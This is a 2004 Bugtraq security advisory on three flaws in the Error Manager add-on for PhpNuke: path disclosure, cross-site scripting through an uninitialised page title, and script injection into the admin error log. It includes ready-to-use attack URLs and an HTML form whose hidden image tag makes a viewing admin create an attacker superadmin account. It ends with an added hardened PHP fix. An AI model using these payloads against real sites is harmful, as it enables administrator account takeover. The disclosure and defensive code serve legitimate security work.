List: bugtraq
Subject: [waraxe-2004-SA#010 - Multiple vulnerabilities in Error Manager
From: Janek Vind <come2waraxe () yahoo ! com>
Date: 2004-03-18 17:02:29
Message-ID: 20040318170229.17259.qmail () search ! securityfocus ! com
{================================================================================}
{ [waraxe-2004-SA#010] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in Error Manager v2.1 for PhpNuke ] }
{ }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 18. March 2004
Location: Estonia, Tartu
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From developer's readme file:
This Error Manager is made by Gijza.net
The idea came from DR3N.tk
This addon is made for PHP-NUKE 6.0. but may work for other versions
Admin CP is also included in this version.
For the latest version go to www.gijza.net
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Full path disclosure
Let's look at the original code:
//language
// The include path is built straight from request-controlled variables
// ($newlang / $lang arrive via register_globals), with no whitelist and no
// existence check, so a bogus value makes PHP emit a warning that names the file.
if( isset( $newlang ) ) {
    include( "language/error/lang-$newlang.php" );
    $language = $newlang;
} elseif ( isset( $lang ) ) {
    include( "language/error/lang-$lang.php" );
    $language = $lang;
} else {
    include( "language/error/lang-$language.php" );
}
So nothing stops us from requesting this PHP file directly, and that leads to a standard PHP error message revealing the full path to error.php:
http://localhost/nuke71/error.php?newlang=foobar
Warning: main(language/error/lang-foobar.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke71\error.php on line 19
2. Cross-Site Scripting aka XSS
Again, let's look at the original code:
// Four independent "if" blocks and no default branch: when $error is none of
// these four values, $pagetitle is never assigned by this script and keeps
// whatever value register_globals handed it from the request.
if ($error == 401) {
    $pagetitle = "- "._EM401."";
}
if ($error == 403) {
    $pagetitle = "- "._EM403."";
}
if ($error == 404) {
    $pagetitle = "- "._EM404."";
}
if ($error == 500) {
    $pagetitle = "- "._EM500."";
}
This is traditionally coded with a "switch/case" construction, but for some reason the author uses an "if/if/if/..." chain here, not even "if/elseif/elseif/else". So if the variable $error is not 401, 403, 404 or 500 but something else, the UNINITIALIZED $pagetitle can be set to any value. This of course leads to XSS conditions:
http://localhost/nuke71/error.php?pagetitle=[xss code here]
One more way to exploit the XSS:
http://localhost/nuke71/error.php?error=>[xss code here]
As with all the PhpNuke XSS cases, using POST parameters, or even better COOKIE parameters, is preferred, because GET parameters are strictly filtered in mainfile.php.
3. Script injection to error log (nasty one!)
This one is my favourite bug. I mean, Error Manager is supposed to log the error conditions on the web server so the admin can find potential bugs on the site, and of course this logging feature will reveal to the admin many (unsuccessful) attacks by "bad guys". It's a shame, but it's true: error logging in Error Manager will log the referer, request URI, etc., but WITHOUT ANY sanitizing against HTML tags ;) So we can inject any javascript code into the error log, and when the admin browses the logs, the website can be compromised: for example cookies can be stolen, additional superadmin accounts can be created without the knowledge of the admin (reference to [waraxe-2004-SA#008 - easy way to get superadmin rights in PhpNuke 6.x-7.1.0]) etc ...
So, here is an attack scenario:
Write an HTML file like this one:
<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>
<FORM action="http://www.victim.com/error.php" method="POST">
<input type="hidden" name="error" value="<img width='0' height='0' border='0' src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala@hot.ee&add_radminsuper=1'></img>404">
<input type="submit" value="Attack">
</FORM>
</center>
<br><br><br>
</BODY>
</HTML>
Use it against the victim server and then just wait until the admin reads the error log, then log in to your brand new superadmin account ;)
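The following is an added example, not code from Error Manager or its author: a hardened version of the three spots in error.php covered by bugs 1, 2 and 3 above. The variable names $newlang, $lang, $error and $pagetitle are the advisory's; the language whitelist, the log file location and the render_log_row() helper are assumptions made for this example.

```php
<?php
// Added example, not the Error Manager author's code. Hardens the three spots in
// error.php that the advisory describes. Whitelist, log path and helper names are
// assumptions for this example.

// 1. Full path disclosure: accept only whitelisted language names and check that
//    the file exists, so PHP never emits a "failed to open stream" warning.
$allowedLangs = ['english', 'estonian'];                 // assumed shipped languages
$requested = $_REQUEST['newlang'] ?? $_REQUEST['lang'] ?? 'english';
$language  = in_array($requested, $allowedLangs, true) ? $requested : 'english';
$langFile  = __DIR__ . "/language/error/lang-$language.php";
if (is_file($langFile)) {
    include $langFile;
}
foreach (['_EM401' => 'Unauthorized', '_EM403' => 'Forbidden',
          '_EM404' => 'Not Found',    '_EM500' => 'Server Error'] as $k => $v) {
    defined($k) || define($k, $v);                        // fallback if no language file
}

// 2. XSS via $pagetitle: a switch with a default branch always initialises
//    $pagetitle in this script, so a value smuggled in through register_globals
//    is overwritten, and casting $error to int keeps "error=>..." out of the page.
$error = (int)($_REQUEST['error'] ?? 500);
switch ($error) {
    case 401: $pagetitle = '- ' . _EM401; break;
    case 403: $pagetitle = '- ' . _EM403; break;
    case 404: $pagetitle = '- ' . _EM404; break;
    default:  $error = 500; $pagetitle = '- ' . _EM500; break;
}

// 3. Script injection into the log: store entries as JSON, one per line, and
//    escape every field again when the admin page renders them, so an injected
//    <img> or <script> tag is shown as text instead of being executed.
$logFile = __DIR__ . '/error_manager.log';               // assumed location
$entry = ['time' => date('c'), 'error' => $error,
          'uri' => $_SERVER['REQUEST_URI'] ?? '', 'referer' => $_SERVER['HTTP_REFERER'] ?? ''];
file_put_contents($logFile, json_encode($entry) . "\n", FILE_APPEND | LOCK_EX);

function render_log_row(array $e): string {
    $esc = fn(string $s) => htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
    return '<tr><td>' . $esc($e['time']) . '</td><td>' . (int)$e['error'] . '</td><td>'
         . $esc($e['uri']) . '</td><td>' . $esc($e['referer']) . '</td></tr>';
}
// Admin viewer: foreach (file($logFile, FILE_IGNORE_NEW_LINES) as $line)
//                   echo render_log_row(json_decode($line, true));
```

With this layout the referer and request URI are still recorded in full, so the admin still sees the attempted injection, but only as inert text.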
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to the torufoorum staff and to all IT security related people in Estonia! Greetings! Special greets to ulljobu!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
---------------------------------- [ EOF ] ------------------------------------